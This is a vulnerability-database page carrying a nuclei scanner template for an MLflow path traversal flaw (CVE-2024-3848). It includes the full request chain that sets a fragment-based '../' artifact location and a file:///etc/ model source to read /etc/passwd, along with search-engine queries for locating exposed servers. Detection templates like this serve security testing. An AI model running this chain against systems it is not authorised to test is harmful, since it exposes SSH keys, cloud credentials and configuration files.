Lucene search
K

Mlflow < 2.11.0 - Path Traversal

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 35 Views

Mlflow < 2.11.0 - Path Traversal vulnerability bypassing CVE-2023-690

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-3848
30 Nov 202413:48
circl
CNNVD
Mlflow 安全漏洞
16 May 202400:00
cnnvd
CVE
CVE-2024-3848
16 May 202409:03
cve
Cvelist
CVE-2024-3848 Path Traversal Bypass in mlflow/mlflow
16 May 202409:03
cvelist
Github Security Blog
MLflow has a Local File Read/Path Traversal bypass
16 May 202409:33
github
NVD
CVE-2024-3848
16 May 202409:15
nvd
OSV
BIT-MLFLOW-2024-3848 Path Traversal Bypass in mlflow/mlflow
27 Jan 202507:13
osv
OSV
GHSA-RFQQ-WQ6W-72JM MLflow has a Local File Read/Path Traversal bypass
16 May 202409:33
osv
OSV
PYSEC-2024-244
16 May 202409:15
osv
Positive Technologies
PT-2024-28025 · Mlflow · Mlflow
16 May 202400:00
ptsecurity
Rows per page
id: CVE-2024-3848

info:
  name: Mlflow < 2.11.0 - Path Traversal
  author: gy741
  severity: high
  description: |
    A path traversal vulnerability exists in mlflow/mlflow version 2.11.0, identified as a bypass for the previously addressed CVE-2023-6909. The vulnerability arises from the application's handling of artifact URLs, where a '#' character can be used to insert a path into the fragment, effectively skipping validation. This allows an attacker to construct a URL that, when processed, ignores the protocol scheme and uses the provided path for filesystem access. As a result, an attacker can read arbitrary files, including sensitive information such as SSH and cloud keys, by exploiting the way the application converts the URL into a filesystem path. The issue stems from insufficient validation of the fragment portion of the URL, leading to arbitrary file read through path traversal.
  impact: |
    Successful exploitation could be lead to disclose of sensitive information such as SSH Keys or Internal configurations.
  remediation: |
    To fix this vulnerability, it is important to update the mlflow package to the latest version 2.12.1.
  reference:
    - https://huntr.com/bounties/8d5aadaa-522f-4839-b41b-d7da362dd610
    - https://nvd.nist.gov/vuln/detail/CVE-2024-3848
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-3848
    cwe-id: CWE-29
    epss-score: 0.43284
    epss-percentile: 0.98566
    cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 5
    vendor: lfprojects
    product: mlflow
    shodan-query: "http.title:\"mlflow\""
    fofa-query:
      - title="mlflow"
      - app="mlflow"
    google-query: intitle:"mlflow"
  tags: cve,cve2024,mlflow,lfi,intrusive,lfprojects,vuln

variables:
  random: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"name": "{{randstr}}", "artifact_location": "http://host#/../../../../../../../../../../../../../../etc/"}

      - |
        POST /api/2.0/mlflow/runs/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"experiment_id": "{{EXPERIMENT_ID}}"}

      - |
        POST /ajax-api/2.0/mlflow/upload-artifact?run_uuid={{RUN_ID}}&path=a?/a HTTP/1.1
        Host: {{Hostname}}

        {{random}}

      - |
        POST /ajax-api/2.0/mlflow/experiments/delete HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"experiment_id": "{{EXPERIMENT_ID}}"}

      - |
        POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"name": "{{randstr}}"}

      - |
        POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"name": "{{randstr}}", "run_id": "{{RUN_ID}}", "source": "file:///etc/"}

      - |
        GET /model-versions/get-artifact?path=passwd&name={{randstr}}&version=1 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body_7
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header_7
        words:
          - "filename=passwd"
          - "application/octet-stream"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: json
        part: body_1
        name: EXPERIMENT_ID
        group: 1
        json:
          - '.experiment_id'
        internal: true

      - type: json
        part: body_2
        name: RUN_ID
        group: 1
        json:
          - '.run.info.run_id'
        internal: true
# digest: 4b0a0048304602210096fa367bacbdc7a45c3e63c4cfbbc3041e4c4eed3fa31a0f806ae586f78b47e7022100af022d4a496d71c1b542e6af6a5d756c0ae94e1bcb9a11299dc1d23c76f050de:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.17.5
CVSS 37.5
EPSS0.43284
SSVC
35